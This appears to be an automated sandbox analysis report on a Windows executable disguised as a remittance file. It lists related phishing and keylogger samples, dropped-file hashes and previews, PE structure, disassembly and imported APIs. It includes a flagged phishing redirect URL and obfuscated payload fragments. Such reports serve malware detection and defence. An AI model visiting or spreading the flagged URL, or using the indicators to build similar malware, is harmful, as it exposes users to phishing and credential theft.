                        https://api.record-data.cashya.com/product/v1/domains/cashalo/applications/CRM/recordData?campaignId=0bdf7530-7c70-11ef-ba8f-d732ea237024&content=footer%20google%20play%20download%20button&function=redirect&groupId=10798&jobId=ecadb6a0-7d5e-11ef-ba8f-d732ea237024&segmentId=6162&service=CRM&taskId=f9dd8380-7c70-11ef-ba8f-d732ea237024&templateId=d4822820-4598-11ef-aa28-754ff3546467&trackingType=click&type=edm&url=https://sjogren.concil.nu/#c2hlbmEudGltYmVybGFrZSR0ZXhhbmFjZW50ZXIuY29tGet hashmaliciousHTMLPhisherBrowse
                        • 1.1.1.1
                        invoice for payment request.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 104.21.32.1
                        dfiCWCanbj.exeGet hashmaliciousLokibotBrowse
                        • 104.21.80.1
                        remitance copy.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.12.205
                        No context
                        No context
                        Process:C:\Users\user\Desktop\Remittance_CT022024.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):81202
                        Entropy (8bit):7.918404107413052
                        Encrypted:false
                        SSDEEP:1536:4aPgR3T4WzJMe3eYCm6bj/u451aIIN2XMCOb46GwND/gbDR9/OFye1y:4aW1t3imej/u6AAa46LDmR9/OrI
                        MD5:30327E8EE1907C15659A033E987FBA87
                        SHA1:DEED006754F37EAA1FC7C438662BB412725A3F7E
                        SHA-256:5BCFD5AE162DBBAC03B82EEAE2B836A454F31BE5F97D0468DC4FC80D7E45CD05
                        SHA-512:2AE162592B992039069E0EA6170485112743FBFAE483BAA4B76C45951B8DA2670234D01CCB5C5DC1D217F4E86D3C232F0C9572A7357E16A5A951283A4CA6694A
                        Malicious:false
                        Reputation:low
                        Preview:EA06......8.zl.Z.V.smn.C.Uf.i...W....@.B.O...@.....|\..B.+.U&.......C..K.z.5......7..fr...}u.T..I...].^..[.Z. ......8....^...x.....A..z.............5....._53...Q>.G.7..(......]......79....Qq3z....g.f. ..r.1.o....MZ uZ..kV.ljU......j.Z.5.V..)....^k.R.N..x...B..... ...W..*` .^.P....W.L.F1P..xt...m8..n4*...Y....|.I..l.......Y....Q.F..jt..P........d......4.N.R..^M....QP.B,..]...4......#Q..J.3..-...q..(&........F.@..... %.P...L.(><..'.2.)...qn.j..E1...P.C.2.qu.9...X.(>.j.KwB.O......0.vy..t..I.<2.)..}u.Q......2.s509.w.<.P2......x.(....^.jt._R.U...mV.w..&..w.^..>....K..... ..kS....y.8..L.<.X....j..yK..5..<......-T.:.w..n..j.#..h..5:t.[/..vRj.>....fSi..%..........U].*9B..8..ji..o*t.....'.l-......j..I^..$.).......L..T..R.U...Q.....*...:\*.Fm6.....|..@....................5$...M.Xm^_.5..n....k...(/.k...6.}.o.......".mz..F.c....5:=....P.t...gL.d.8~..G...P...eR...4...y .c.8..+c6.D....V.J.K.......h..jh.a...(@C..^.V.2.S_.......:.".[..9@..'.v.U...c.....
                        Process:C:\Users\user\Desktop\Remittance_CT022024.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):9772
                        Entropy (8bit):7.62185860025315
                        Encrypted:false
                        SSDEEP:192:Elu1EoJn/SeWGan1ddLEON4X8nWL6uOpW8d0TPibW7dPLBEdLpEDMMMHvH4n:ogpJn/6dwhXmBpKnR1E5puMHHvQ
                        MD5:D1048F1E8880F69C96C6654921505898
                        SHA1:E7CE733C421D9DF522F9F9E4FEB1E5ADB6B8844D
                        SHA-256:9C36BAABAC649806C8DC827B5B7C583A49D9B6796B44E2391DAA47AB50E81990
                        SHA-512:35A5EE49D16FEA492ECE211A40BD55004942EBFA92BDC1B10FB64B0BD23EA0E4156D340F86B2E9238C9F7F60213D8950868B11278C06D5027F2C3722111B9E3C
                        Malicious:false
                        Reputation:low
                        Preview:EA06..p....R)}..t..WK..O%....)..Au..n....O!....9..Gu.Hd@.]....i...K........|.`.o..u.Hn....../.I......e.@....r.-..%.Z.E...6.0.o.B..]....x.g...I$.@..]....N..r9...........H. ...r.%.)...c ....Av.H.......F.3<..\..6...N........x.D....B\.....]..0.H.r{..@...\.5_..F..... 5_..^.U....5_....U...@5_..N.U...5\..>2`..H@^.v.Z..E!.z.A!.....@.......8.G../Z..e......j\...}.@.u....$.../.A/...d.G_T.......@>_.......zE".....x....P...................`.M..`... ...t...@....'.#..@{>K...c...0..]d ._..^....A.>K.#G.u..3|wI8.G.#..$.8_..Et..i|wI....t.h...`........ ..2;.....$7@;../..R@.L..7.x.f..+..fd.Yt..!...`...f...E...Y.<..3.9-............w9<....@.....2p....<d....,vL.........!+..'$.....,fA%.\.wY.......r.%.X..c2...Kq.Y.!...Gd.....,f...K. . .# ....c.@......$.^.h.s.....,vH......t....p40......d`..........4..@.6.-..p..R....%...R@.N..;".`..........E/....c. ..\...wx.....vB........E......y6....p.c2....#..b.!....F ....B5t..%.........v@......d.K..\...B2 .....;/.X...v..........x..e....IdR....t...
                        Process:C:\Users\user\Desktop\Remittance_CT022024.exe
                        File Type:ASCII text, with very long lines (28674), with no line terminators
                        Category:dropped
                        Size (bytes):28674
                        Entropy (8bit):3.5817281875647344
                        Encrypted:false
                        SSDEEP:768:xyO2B+PCEPa7bp06GBGsoPjdswW3Ji/aHf:xy1B+xIp06Gs9PjCwW3U/a/
                        MD5:1E965E184E2EE055B20DADAFE31214F3
                        SHA1:5978CE69B6EB0AA0239EBC994570D6EBFB072932
                        SHA-256:8CA6BBC33F88E37C8CD85D0A183FC03A203D844600C51AC806AA3940520353F0
                        SHA-512:CEEDD0FE3716E41E4FFD61016E2BBEB9A41D23A1368BCCE2E4C67B2A70B1091CA0FF8766EFD44B65B2D7CA48E186296927035C43755C79EC5D1BBAB8311BBD7C
                        Malicious:false
                        Reputation:low
                        Preview:'o""/urt/&rttt'%''''"!" u/!u''''''!!/.#"/#u.!"''''''!!/.#s/!uv %''''''!!/.""//u/!r''''''!!/.#"/vu.!"''''''!!/.#s/tuv!t''''''!!/.""/ru/$$''''''!!/.#".'u.$%''''''!!/.#s.%uv%r''''''!!/."".#u/!#''''''!!/.#".!u.!t''''''!!/.#s./uv!t''''''!!/."".v$$t'!!/.#".tu.!r''''''!!/./s##qqqqqquv #''''''!!/.."#!qqqqqqu/!#''''''!!/./"#/qqqqqqu.!t''''''!!/./s#vqqqqqquv!t''''''!!/.."#tqqqqqqu/%r''''''!!/./"#rqqqqqqu.!#''''''!!/./s"'qqqqqquv!t''''''!!/..""%qqqqqqu/!t''''''!!/./""#qqqqqq$$t.!!/./s"!qqqqqquv "''''''!!/.""s'u/ $''''''!!/.#"s%u.!"''''''!!/.#ss#uv %''''''!!/.""s!u/$$''''''!!/.#"s/u.$%''''''!!/.#ssvuv%r''''''!!/.""stu/!#''''''!!/.#"sru.!t''''''!!/.#sr'uv!t''''''!!/.""r%$$t'!!/.#"r#u.!&''''''!!/./s!/qqqqqquv!#''''''!!/.."!vqqqqqqu/ !''''''!!/./"!tqqqqqqu.!&''''''!!/./s!rqqqqqquv '''''''!!/.." 'qqqqqqu/!.''''''!!/./" %qqqqqqu.$$''''''!!/./s #qqqqqquv$%''''''!!/.." !qqqqqqu/%r''''''!!/./" /qqqqqqu.!#''''''!!/./s vqqqqqquv!t''''''!!/.." tqqqqqqu/!t''''''!!/./" rqqqqqq$$t.!!/.#s/'uv $''''''!!/.""v'u/!/
                        Process:C:\Users\user\Desktop\Remittance_CT022024.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):7.437691686975081
                        Encrypted:false
                        SSDEEP:1536:KxsryYK1dvaGgajWUHbYe+sysDSkLV1JXZcHc/hHt8HvVPguakFP6isw8HWO3hUC:usuYn/WWU7usLSG0kwvVYul6iX82O3hl
                        MD5:EE1829591121A35CC4D2629612EE7D44
                        SHA1:BC3EF1BF6AAF558418F50155A5FC46DA4593D74D
                        SHA-256:DF5079BA4420CE2BF584A763BA612A444BA4C27EBC690AE036B0569D187D4E14
                        SHA-512:4EC6D563B2098D0A344531B15B284E51E9171290442FB1DE4A18C2AC421685658EB89F404A7E0E4AB52032D9114042659EED4A6D3F7B573ADF79D3C5BD19787F
                        Malicious:false
                        Reputation:low
                        Preview:u..WM4RZ0Z36..QC.U668FUW.4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJU66.FUW@+.T4.:.s.P..tb^Q5u'<[5(U7.U3!?,>uTS.4 9n]<zp.`.? 5&dX;<.FUWN4RZ..K...G... ...C.......%....... ...L..D..h....G... ...C.......%...F.. ......D..h...G.wg....C..]12..%.ROQCJU66h.UW.5VZ.R_aROQCJU66.FVVE5^Z4b26R.YCJU66..TWN$RZ4.26RO.CJE668DUWK4SZ4Z36WOPCJU668f_WN0RZ4Z36POQ.JU&68VUWN4BZ4J36ROQCZU668FUWN4RZ..266OQCJU668FUWN4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJ.76dFUWN4RZ4Z36ROQCJU668FUWN4RZ..VN&OQC.c768VUWN.SZ4^36ROQCJU668FUWn4R:.(WW&.QC*.668.TWNvRZ4f26ROQCJU668FUW.4R..>RB3OQCn.>68.TWN6RZ4$26ROQCJU668FUW.4R.."36ROQCJu668F_WN.RZ4.26ROQCJU668FUWN4R.4Z36ROQCJU668FUWN4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJU668FUWN4RZ4Z36ROQCJU66
                        Process:C:\Windows\SysWOW64\svchost.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:1
                        Process:C:\Windows\SysWOW64\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):47
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3::
                        MD5:0D7DB7FF842F89A36B58FA2541DE2A6C
                        SHA1:50F3B486F99FB22648D26870E7A5CBA01CAED3DA
                        SHA-256:140EDA45FE001C0FE47EDD7FC509FF1882D46FBCB7C7437D893C1FB83012E433
                        SHA-512:6E6570A7CC802760730DB659A4EDE4221AC2CD944F4B0D97B0A5C8A9F2A072899E3C3FC5DAC336B53F8ACCDE81CBEECA6C5998A1471A2F91EB60E3E13620368D
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:...............................................
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):6.837248997179837
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:Remittance_CT022024.exe
                        File size:961'024 bytes
                        MD5:6ba300b78a4f898b931cb4889ce9c461
                        SHA1:198207a44362b3e7cd1065973c0047619753ac99
                        SHA256:0db0c831bf2a05700a58dbef8e3ef35af21b6a6dd4de42fa68dfbc608aaf2d5a
                        SHA512:946a890c7bd74ca4e70f9e51fafd2308ce722d33516c0b1350d8edcbabda66e00e2a9f44175578f570df94531945e8041e95c5e8338ef2a5fcd9397eb56b2581
                        SSDEEP:24576:Hu6J33O0c+JY5UZ+XC0kGso6Fa6jdol/kIX6lYtWY:Bu0c++OCvkGs9Fa6jdg/kntY
                        TLSH:8F15AD2273DDC360CB669173BF6AB7016EBF3C614630B85B2F980D7DA950162162D7A3
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                        Icon Hash:aaf3e3e3938382a0
                        Entrypoint:0x427dcd
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x67B72FF3 [Thu Feb 20 13:36:51 2025 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:afcdf79be1557326c854b6e20cb900a7
                        Instruction
                        call 00007F5F18535AAAh
                        jmp 00007F5F18528874h
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        push edi
                        push esi
                        mov esi, dword ptr [esp+10h]
                        mov ecx, dword ptr [esp+14h]
                        mov edi, dword ptr [esp+0Ch]
                        mov eax, ecx
                        mov edx, ecx
                        add eax, esi
                        cmp edi, esi
                        jbe 00007F5F185289FAh
                        cmp edi, eax
                        jc 00007F5F18528D5Eh
                        bt dword ptr [004C31FCh], 01h
                        jnc 00007F5F185289F9h
                        rep movsb
                        jmp 00007F5F18528D0Ch
                        cmp ecx, 00000080h
                        jc 00007F5F18528BC4h
                        mov eax, edi
                        xor eax, esi
                        test eax, 0000000Fh
                        jne 00007F5F18528A00h
                        bt dword ptr [004BE324h], 01h
                        jc 00007F5F18528ED0h
                        bt dword ptr [004C31FCh], 00000000h
                        jnc 00007F5F18528B9Dh
                        test edi, 00000003h
                        jne 00007F5F18528BAEh
                        test esi, 00000003h
                        jne 00007F5F18528B8Dh
                        bt edi, 02h
                        jnc 00007F5F185289FFh
                        mov eax, dword ptr [esi]
                        sub ecx, 04h
                        lea esi, dword ptr [esi+04h]
                        mov dword ptr [edi], eax
                        lea edi, dword ptr [edi+04h]
                        bt edi, 03h
                        jnc 00007F5F18528A03h
                        movq xmm1, qword ptr [esi]
                        sub ecx, 08h
                        lea esi, dword ptr [esi+08h]
                        movq qword ptr [edi], xmm1
                        lea edi, dword ptr [edi+08h]
                        test esi, 00000007h
                        je 00007F5F18528A55h
                        bt esi, 03h
                        jnc 00007F5F18528AA8h
                        Programming Language:
                        • [ASM] VS2013 build 21005
                        • [ C ] VS2013 build 21005
                        • [C++] VS2013 build 21005
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [ASM] VS2013 UPD4 build 31101
                        • [RES] VS2013 build 21005
                        • [LNK] VS2013 UPD4 build 31101
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x22180.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xea0000x711c.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0xc70000x221800x2220098ab4c7304e5000a1ca48e2053a0a7b3False0.8077566964285714data7.5555105577759605IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0xea0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                        RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                        RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                        RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                        RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                        RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                        RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                        RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                        RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                        RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                        RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                        RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                        RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                        RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                        RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                        RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                        RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                        RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                        RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                        RT_RCDATA0xcf7b80x19448data1.0003961505758676
                        RT_GROUP_ICON0xe8c000x76dataEnglishGreat Britain0.6610169491525424
                        RT_GROUP_ICON0xe8c780x14dataEnglishGreat Britain1.25
                        RT_GROUP_ICON0xe8c8c0x14dataEnglishGreat Britain1.15
                        RT_GROUP_ICON0xe8ca00x14dataEnglishGreat Britain1.25
                        RT_VERSION0xe8cb40xdcdataEnglishGreat Britain0.6181818181818182
                        RT_MANIFEST0xe8d900x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                        DLLImport
                        WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                        VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                        WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                        PSAPI.DLLGetProcessMemoryInfo
                        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                        USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                        UxTheme.dllIsThemeActive
                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                        USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                        GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                        COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
